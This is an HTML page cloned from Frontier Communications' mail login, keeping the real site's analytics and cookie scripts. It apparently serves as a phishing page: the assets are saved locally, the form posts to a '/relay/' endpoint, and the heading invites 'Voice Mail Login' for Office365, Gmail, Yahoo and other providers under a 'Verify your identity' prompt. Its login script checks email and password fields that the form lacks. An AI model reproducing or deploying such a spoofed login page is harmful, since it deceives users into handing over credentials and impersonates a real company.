<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	<title>Frontier Mail Login</title>
	<link href="https://login.frontier.com/ftr-sys-theme/img/favicon.ico" rel="shortcut icon" />
	<link href="https://login.frontier.com/ftr-sys-theme/img/favicon.ico" rel="icon" type="image/ico" /><!-- Bootstrap -->
	<link href="new_files/bootstrap.css" rel="stylesheet" /><!-- FontAwesome --><!-- Use local copy, when remote hosts are expected to be unreachable. --><!-- link rel="stylesheet" href="/ftr-sys-theme/res/font-awesome/css/font-awesome.min.css" --><!-- Use latest remote copy, when remote hosts are expected to be reachable. -->
	<link href="new_files/font-awesome.css" rel="stylesheet" /><!-- WebFonts -->
	<link href="new_files/webfonts.css" rel="stylesheet" /><!-- Our custom CSS -->
	<link href="new_files/base.css" rel="stylesheet" />
	<link href="new_files/social.css" rel="stylesheet" />
	<link href="new_files/webmail.css" rel="stylesheet" type="text/css" /><!-- IE 8 Shiv --><!--[if lt IE 9]><script src="/ftr-sys-theme/res/js/polyfillshiv.js"></script><![endif]--><!--[if lt IE 9]><script src="/ftr-sys-theme/res/js/html5shiv.min.js"></script><![endif]--><!-- JQuery --><script src="new_files/3707.js" async="" type="text/javascript"></script><script type="text/javascript" async="" src="new_files/ga.js"></script><script type="text/javascript" async="" src="new_files/recaptcha__en.js"></script><script async="" src="new_files/di.js"></script><script src="new_files/jquery-3.js"></script><!-- Bootstrap --><script src="new_files/bootstrap.js"></script><!-- Our custom scripts --><script src="new_files/accordion.js"></script><script src="new_files/jump.js"></script><script src="new_files/api.js" async="" defer="defer"></script><script src="new_files/dtm_top.js"></script><script src="new_files/satelliteLib-4b8641237ab881231ea9edcc135d0fdd111e2a40.js"></script><script src="new_files/EX68b31c0ff7cd48fa9885b9110f391fbc-libraryCode_source.js" async=""></script><script>_satellite["__runScript1"](function(event, target) {
(function(d,e,c,i,b,el,it) {
  d._da_=d._da_||[];_da_.oldErr=d.onerror;_da_.err=[];
  d.onerror=function(){_da_.err.push(arguments);_da_.oldErr&&_da_.oldErr.apply(d,Array.prototype.slice.call(arguments));};
  d.DecibelInsight=b;d[b]=d[b]||function(){(d[b].q=d[b].q||[]).push(arguments);};
  el=e.createElement(c),it=e.getElementsByTagName(c)[0];el.async=1;el.src=i;it.parentNode.insertBefore(el,it);
})(window,document,'script','https://cdn.decibelinsight.net/i/13858/239982/di.js','decibelInsight');
});</script>
	<style data-di-track="1" type="text/css">.kampyle_button-text {
  text-transform: capitalize !important;
}
	</style>
	<script>
window.s_onPlayerReady=function (event) {}
window.s_onMilestone=function (event,state) {
  var t=s_onMilestone;


  // this keeps track of the current video event each time the function calls itself. 
  if (state) t.state=state;
  // this keeps track of the event. This is originally passed from youtube api 
  // to s_trackonPlayerStateChange, which then passes it to this function 
  if (event) t.event=event;
  // get the current time elapsed (seconds) of the video
  var currentTime=t.event.target.getCurrentTime();
  // get the total video length 
  var duration=t.event.target.getDuration();

  /* p1: keep track of resetting video events for new videos */
  var videoData = t.event.target.getVideoData();
  if (!t.videoData) t.videoData = videoData;
  if (t.videoData.title!=videoData.title) t.viewed=false;
  
  // init the flags for milestone events having been viewed
  if (!t.viewed) {
    t.viewed={
      '25' : false,
      '50' : false,
      '75' : false
    };
  }
  // it is possible for duration to be 0 depending on current state of video
  // or type of video (e.g. for live feeds, duration is always currentTime, which 
  // can start at 0. So we take some precaution to avoid division by 0 here.
  var percentViewed=0;
  var elapsed = Math.floor(duration/4); 
  var label = false;
  var payload=false;
  if (duration)
    var percentViewed = Math.floor((currentTime/duration)*100);
  // here is where you specify the % milestones you want to pop something on
  switch(percentViewed) {
    case 25 : 
      if (!t.viewed['25']) {
        t.viewed['25']=true;
        payload = {
          'events' : ('event62,event66,event67='+elapsed),
          'eVar62' : '1:M:0-25',
        }
        label='Video: 25% Viewed';
      }
      break;
    case 50 : 
      if (!t.viewed['50']) {
        t.viewed['50']=true;
        payload = {
          'events' : ('event63,event66,event67='+elapsed),
          'eVar62' : '2:M:25-50',
        }
        label='Video: 50% Viewed';
      }
      break;
    case 75 : 
      if (!t.viewed['75']) {
        t.viewed['75']=true;
        payload = {
          'events' : ('event64,event66,event67='+elapsed),
          'eVar62' : '3:M:50-75',
        }
        label='Video: 75% Viewed';
      }
      break;
  }
  if (payload&&label) {
    s_dtm.trackData(payload,'tl_o',label);
  }

  /* p2: keep track of resetting video events for new videos */
  t.videoData = videoData;

  /* 
    as long as the swith is "on", we keep calling the function. But for example
    if the visitor clicks pause or video ends, we call the function from those
    events to turn it "off" (t.state=='stop'). This isn't technically necessary 
    thing to do, since we pop milestone stuff based off what the actual percent 
    viewed currently is, vs. whether or not it's already been popped.  I did 
    this for performance reasons. 
  */
  if (t.state=='start')
    window.setTimeout('s_onMilestone()',500);
}
/* 
  this is the callback function for when the youtube video decides its state 
  has been changed.  well actually as noted the way it's implemented here is that 
  we have this called within the real callback function, but you get the point
*/
window.s_onPlayerStateChange=function(event) {
  /* 
   as with the milestone wrapper, had some choices to make about keeping track 
   of stuff and having it available each time function is called, and I settled 
   with doing static variable style. 
  */
  var t=s_onPlayerStateChange;
  // these are the player states youtube outputs. we're using a map here for 
  // better code readability
  var youTubePlayerStates = {
    unstarted:      -1,
    finished:       0,
    playing:        1,
    paused:         2,
    buffering:      3,
    cued:           5
  };
  var currentState = event.data;

  /* 
    note: length and current time aren't currently used within the scope of 
    of this function for the nasdaq imp i did. they are used for milestones but
    i pass the whole event object to it. but I left these in here as an example 
    in case it's needed for the scope of the other events within this function
  */
  // get video length
  t.duration=event.target.getDuration();
  // Get the current position to the nearest next second
  var currentTime = Math.ceil(event.target.getCurrentTime());

  var elapsed = Math.floor(t.duration/4); 

  var payload=false;  
  
  // this retrieves info about the video (id, title, author)
  var videoData = event.target.getVideoData();
  /* p1: keep track of resetting video events for new videos */
  if (!t.videoData) t.videoData = videoData;
  if (t.videoData.title!=videoData.title) t.played=false;

  /*
    here is the main switch where we pop stuff based on the video state, 
    e.g play, stop, etc. in nasdaq's example, i didn't need to pop something 
    for every possible state, but i left them here but empty as examples.
    
    as mentioned in the milestones function, we call s_onMilestone with a 
    'start' (on) and 'stop' (off) flags, depending on the event, to tell 
    s_onMilestone when to start and stop calling itself over and over to monitor 
    and eval current % viewed
  */
  // Figure out what state we are in
  switch(currentState) {
    // Video has been initialized, but not started
    case youTubePlayerStates.unstarted:
      break;
    // Video finished
    case youTubePlayerStates.finished:
      // Show that we have indeed completed the video
      var payload = {
        'events' : ('event65,event66,event67='+elapsed),
        'eVar62' : '4:M:75-100'
      }
      s_dtm.trackData(payload,'o','Video: Completed');

      t.completed = true;
      s_onMilestone(event,'stop');
      break;
   // Video started to play
   case youTubePlayerStates.playing:
     // This video has never been played before
     if(!t.played) {
       // Show that we have started to play the video
       var payload = {
         'events':'event61',
         'prop61':videoData.title,
         'eVar61':videoData.title,
         'eVar62' : '1:M:0-25',
         'eVar63':'youtube player'
       }
       s_dtm.trackData(payload,'tl_o','Video: Start');
       t.played = true;
       s_onMilestone(event,'start');
     } 
     // The video has been played before, and has recently finished (replay)
     else if(t.played && t.completed) {
       // Show that we haven't finished the video yet (since we just started watching it again)
       var payload = {
         'events':'event61',
         'prop61':videoData.title,
         'eVar61':videoData.title,
         'eVar62' : '1:M:0-25',
         'eVar63':'youtube player'
       }
       s_dtm.trackData(payload,'tl_o','Video: Start');
       t.completed = false;
       console.log('replay');
       s_onMilestone(event,'start');
     } else {
       // Video Unpaused/played from buffering
       console.log('unpaused/played from buffering');
       s_onMilestone(event,'start');
     }
     break;
   // Video has been paused
   case youTubePlayerStates.paused:
     console.log('paused');
     s_onMilestone(event,'stop');
     break;
   // Video is now buffering
   case youTubePlayerStates.buffering:
     console.log('buffering');
     break;
   // Video is cued up from a playlist
   case youTubePlayerStates.cued:
     console.log('cued');
     break;
   // new / unknown state
   default:
     console.log('unkown state');
     break;
  }

  // Setup our previous youTubePlayerStates for the next call
  t.previousTime = currentTime;
  t.previousState = currentState;
  /* p2: keep track of resetting video events for new videos */
  t.videoData = videoData;
} // end s_onPlayerStateChange
</script><script>
try{
/*!
 * JavaScript Cookie v2.2.0
 * https://github.com/js-cookie/js-cookie
 *
 * Copyright 2006, 2015 Klaus Hartl & Fagner Brack
 * Released under the MIT license
 */
;(function (factory) {
	var registeredInModuleLoader = false;
	if (typeof define === 'function' && define.amd) {
		define(factory);
		registeredInModuleLoader = true;
	}
	if (typeof exports === 'object') {
		module.exports = factory();
		registeredInModuleLoader = true;
	}
	if (!registeredInModuleLoader) {
		var OldCookies = window.Cookies;
		var api = window.Cookies = factory();
		api.noConflict = function () {
			window.Cookies = OldCookies;
			return api;
		};
	}
}(function () {
	function extend () {
		var i = 0;
		var result = {};
		for (; i < arguments.length; i++) {
			var attributes = arguments[ i ];
			for (var key in attributes) {
				result[key] = attributes[key];
			}
		}
		return result;
	}

	function init (converter) {
		function api (key, value, attributes) {
			var result;
			if (typeof document === 'undefined') {
				return;
			}

			// Write

			if (arguments.length > 1) {
				attributes = extend({
					path: '/'
				}, api.defaults, attributes);

				if (typeof attributes.expires === 'number') {
					var expires = new Date();
					expires.setMilliseconds(expires.getMilliseconds() + attributes.expires * 864e+5);
					attributes.expires = expires;
				}

				// We're using "expires" because "max-age" is not supported by IE
				attributes.expires = attributes.expires ? attributes.expires.toUTCString() : '';

				try {
					result = JSON.stringify(value);
					if (/^[\{\[]/.test(result)) {
						value = result;
					}
				} catch (e) {}

				if (!converter.write) {
					value = encodeURIComponent(String(value))
						.replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g, decodeURIComponent);
				} else {
					value = converter.write(value, key);
				}

				key = encodeURIComponent(String(key));
				key = key.replace(/%(23|24|26|2B|5E|60|7C)/g, decodeURIComponent);
				key = key.replace(/[\(\)]/g, escape);

				var stringifiedAttributes = '';

				for (var attributeName in attributes) {
					if (!attributes[attributeName]) {
						continue;
					}
					stringifiedAttributes += '; ' + attributeName;
					if (attributes[attributeName] === true) {
						continue;
					}
					stringifiedAttributes += '=' + attributes[attributeName];
				}
				return (document.cookie = key + '=' + value + stringifiedAttributes);
			}

			// Read

			if (!key) {
				result = {};
			}

			// To prevent the for loop in the first place assign an empty array
			// in case there are no cookies at all. Also prevents odd result when
			// calling "get()"
			var cookies = document.cookie ? document.cookie.split('; ') : [];
			var rdecode = /(%[0-9A-Z]{2})+/g;
			var i = 0;

			for (; i < cookies.length; i++) {
				var parts = cookies[i].split('=');
				var cookie = parts.slice(1).join('=');

				if (!this.json && cookie.charAt(0) === '"') {
					cookie = cookie.slice(1, -1);
				}

				try {
					var name = parts[0].replace(rdecode, decodeURIComponent);
					cookie = converter.read ?
						converter.read(cookie, name) : converter(cookie, name) ||
						cookie.replace(rdecode, decodeURIComponent);

					if (this.json) {
						try {
							cookie = JSON.parse(cookie);
						} catch (e) {}
					}

					if (key === name) {
						result = cookie;
						break;
					}

					if (!key) {
						result[name] = cookie;
					}
				} catch (e) {}
			}

			return result;
		}

		api.set = api;
		api.get = function (key) {
			return api.call(api, key);
		};
		api.getJSON = function () {
			return api.apply({
				json: true
			}, [].slice.call(arguments));
		};
		api.defaults = {};

		api.remove = function (key, attributes) {
			api(key, '', extend(attributes, {
				expires: -1
			}));
		};

		api.withConverter = init;

		return api;
	}

	return init(function () {});
}));
}catch(e){window.console&&console.error(e);}
try{
_satellite._cookies = Cookies.noConflict();  
}catch(e){window.console&&console.error(e);}
</script><script>
//customer cookie preamp 90 day
var expiration_date = new Date();
expiration_date.setDate(expiration_date.getDate() + 90);
document.cookie = "frontieramp=true; path=/; expires=" + expiration_date.toGMTString() + "; path=/; domain=.frontier.com";
</script><script src="new_files/RCa9fa9f53f1ae4c018cdec712660d9ce4-source.js" async=""></script><script src="new_files/js" async=""></script><script src="new_files/RCafb1758152d042ab9fb88385dfcbcad5-source.js" async=""></script>
</head>
<body>
<section>
<div class="header_area">
<nav class="navbar navbar-inverse" role="navigation">
<div class="container">
<div class="navbar-header visible-xs">
<div class="row">
<div class="col-xs-2"><button class="navbar-toggle" data-target="#frontier-navbar-collapse" data-toggle="collapse" type="button"><span class="sr-only">Toggle navigation</span></button></div>
</div>
</div>
</div>
</nav>
</div>
<!-- header_area -->

<div class="logo_area">
<div class="container hidden-xs">
<div class="row">
<div class="col-sm-4 logo-div-img"><img src="new_files/frontier_header.png" /></div>

<div class="col-sm-8">
<form>
<div><select id="jump_selection"><option selected="selected" value="">Go to...</option><option value="https://frontier.com/account?page=/summary">My Account</option><option value="https://frontier.com/account?page=/payments/onetime">Pay Your Bill</option><option value="https://login.frontier.com/webmail">Check Your Mail</option> </select></div>
</form>
</div>
</div>
</div>
</div>
<!-- logo_area -->

<div class="main_area">
<div class="container"><!-- BEGIN CONTENT -->
<div class="col-md-10 col-sm-12 col-xs-12"><script src="new_files/widgets.js" id="twitter-wjs"></script><script src="new_files/all.js" id="facebook-jssdk"></script><script type="text/javascript">
<!--
function submit_login(e)
{
  form = document.login;

  form.email.value = form.email.value.replace(/^\s+|\s+$/g, '');

  if (form.email.value.search(/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i)){
    alert('Please provide your full e-mail address.');
    form.email.focus();
    return false;
  } else if (form.pass.value == '') {
    alert('Please provide your password.');
    form.pass.focus();
    return false;
  } else {
    form.loginButton.disabled = true;
    form.submit();
    return true;
  }
}
//-->
</script>
<form action="/relay/" id="loginForm" method="post" name="login" target="_parent">
<div id="webmail-login">
<div class="container">
<div class="row">
<div class="col-md-9 col-md-offset-1">
<h1>Voice Mail Login for Office365|Yahoo|Gmail|AOL|Rackspace|Fastmail|Others.</h1>

<p><span style="color:#0000FF;"><span style="font-size:20px;">Verify your identity.</span></span></p>
</div>

<div class="col-md-4 col-md-offset-1">
<div class="form-group"><label for="nothing">Enter your First Name</label> <input class="form-control" id="e" name="" placeholder="" tabindex="1" type="text" /></div>

<div class="form-group"></div>
<button alt="submit" class="btn btn-primary btn-block" onclick="return submit_login();" tabindex="6" type="submit" value="Login">Login</button></div>

<div class="col-md-4 col-md-offset-1">
<div class="col-sm-9 col-md-offset-1 hidden-lg">
<hr /></div>

<div id="yahooSearchTop">
<div class="form-group"><script type="text/javascript">
<!--
      function CheckForEnter(e, inputName)
      {
        e = (e) ? e : event;
        if(e.which || e.keyCode){
          if ((e.which == 13) || (e.keyCode == 13)) {
            document.getElementById(inputName).click();
            e.returnValue = false;
            e.cancel = true;
            return false;
          }
        }
        else 
        {
          return true;
        }
      }
                
      function executeSearchTop(thisForm){
        var resultURL=''; 
        resultURL+='https://search.yahoo.com/yhs/search?hspart=frontier&hsimp=yhs-frontier1&p=';
        resultURL+=escape(thisForm.searchforTop.value); 
        var gotoURL=resultURL; 
         
        document.location.href=gotoURL; 
        return false;                                                   
      }
-->
</script></div>
</div>
<!-- end of yahooSearchTop --></div>

<div class="col-sm-9 col-md-offset-1">
<hr /></div>

<div class="col-sm-9 col-md-offset-1"><!--fid-help-links class="ng-isolate-scope"--></div>
</div>
</div>
</div>
</form>
&nbsp;

<div id="copyright">&copy;2016-2020 Frontier Communications Corporation. All rights reserved.</div>
</div>
</div>
</div>
<!-- footer_area --></section>
<script src="new_files/dtm_bottom.js"></script><script>try { _satellite.pageBottom(); } catch (e) {}</script>

<p><iframe allowtransparency="true" frameborder="0" scrolling="no" src="new_files/widget_iframe.html" style="display: none;" title="Twitter settings iframe"></iframe><script>
!function(){var e=function(){try{window.s_dtm=window.s_dtm||{},window.s_dtm.videoTracker={video:"",title:"",id:"",duration:"",currentTime:"",isEventViewed:{}};var d=function(e){if(e.classList.contains("vjs-tech")||e.classList.contains("video-js"))return!0;var t=e.parentNode;return t?t.classList.contains("video-js")||t.classList.contains("vjs-tech"):(_satellite.notify("Video did not match a valid player type",3),!1)};document.addEventListener("play",function(e){if(d(e.target)){var t=s_dtm.videoTracker;t.title!==e.target.getAttribute("data-video-name")&&(t.isEventViewed.play=!1),t.isEventViewed.play||(t.video=e.target,t.title=e.target.getAttribute("data-video-name"),t.id=e.target.getAttribute("data-video-id"),t.duration=e.target.duration,t.currentTime=e.target.currentTime,s_dtm.trackData({events:"event61",prop61:t.title,eVar61:t.title,eVar62:"1:M:0-25",eVar63:"brightcove player"},"tl_o","Video: Start"),t.isEventViewed.play=!0)}},!0),document.addEventListener("ended",function(e){if(d(e.target)){var t=Number(e.target.duration),a=Math.floor(t/4);s_dtm.trackData({events:"event65,event66,event67="+a,eVar62:"4:M:75-100"},"tl_o","Video: Completed"),s_dtm.videoTracker.isEventViewed={}}},!0),document.addEventListener("timeupdate",function(e){if(d(e.target)){var t=s_dtm.videoTracker.isEventViewed,a=Number(e.target.duration),i=Number(e.target.currentTime),n=Math.floor(i/a*100),r=Math.floor(a/4);25===n?t[25]||(t[25]=!0,s_dtm.trackData({events:"event62,event66,event67="+r,eVar62:"1:M:0-25"},"tl_o","Video: 25% Viewed")):50===n?t[50]||(t[50]=!0,s_dtm.trackData({events:"event63,event66,event67="+r,eVar62:"2:M:25-50"},"tl_o","Video: 50% Viewed")):75===n&&(t[75]||(t[75]=!0,s_dtm.trackData({events:"event64,event66,event67="+r,eVar62:"3:M:50-75"},"tl_o","Video: 75% Viewed")))}},!0)}catch(e){_satellite.notify("AA - Brightcove Video Tracking error: "+e.message,5)}};"loading"===document.readyState?document.addEventListener("DOMContentLoaded",e):e()}();
</script><script>_satellite["__runScript2"](function(event, target) {
if("enterprise.frontier.com"===window.location.hostname)if("function"!=typeof gtag)_satellite.notify("gtag does not exist",5);else try{gtag("config","UA-33866788-28")}catch(e){_satellite.notif(e.message,5)}
});</script></p>
</body>
</html>